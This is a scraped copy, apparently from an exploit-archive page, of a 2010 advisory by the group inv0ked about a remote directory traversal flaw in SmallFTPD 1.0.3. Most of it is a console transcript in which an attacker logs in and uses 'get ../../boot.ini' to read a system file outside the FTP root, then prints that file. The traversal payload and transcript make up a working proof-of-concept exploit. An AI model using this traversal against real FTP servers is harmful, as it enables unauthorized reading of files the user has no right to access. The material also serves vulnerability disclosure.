扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
# _ ___________ #(_)____ _ __/ __ \/ /_________/ /_/_/ | # / // __ \ | / / / / / //_/ _ \/ __// / / / #/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # SmallFTPD is vulnerable for a path traversal, the following will explain you how to readfiles # The vulnerability allows an unprivileged attacker to read files whom he has no permissions to. # The vulnerable FTP command are: # * GET - Read File #----------------------------------- # Vulnerability Title: SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability # Date: 31/10/2010 # Author: Pr0T3cT10n # Software Link: http://sourceforge.net/projects/smallftpd/files/smallftpd/smallftpd-1.0.3-fix/smallftpd-1.0.3-fix.zip/download # Affected Version: 1.0.3 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL ### Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Admin>ftp 127.0.0.1 Connected to 127.0.0.1. 220- smallftpd 1.0.3 220- check http://smallftpd.free.fr for more information 220 report bugs to smallftpd@free.fr User (127.0.0.1:(none)): test 331 User name okay, password required. Password: 230 User logged in. ftp> get ../../boot.ini 200 Port command successful. 150 Data connection ready. 226 Transfer complete. ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec. ftp> bye 221 Good bye. C:\Documents and Settings\Admin>type boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" |
体验盒子
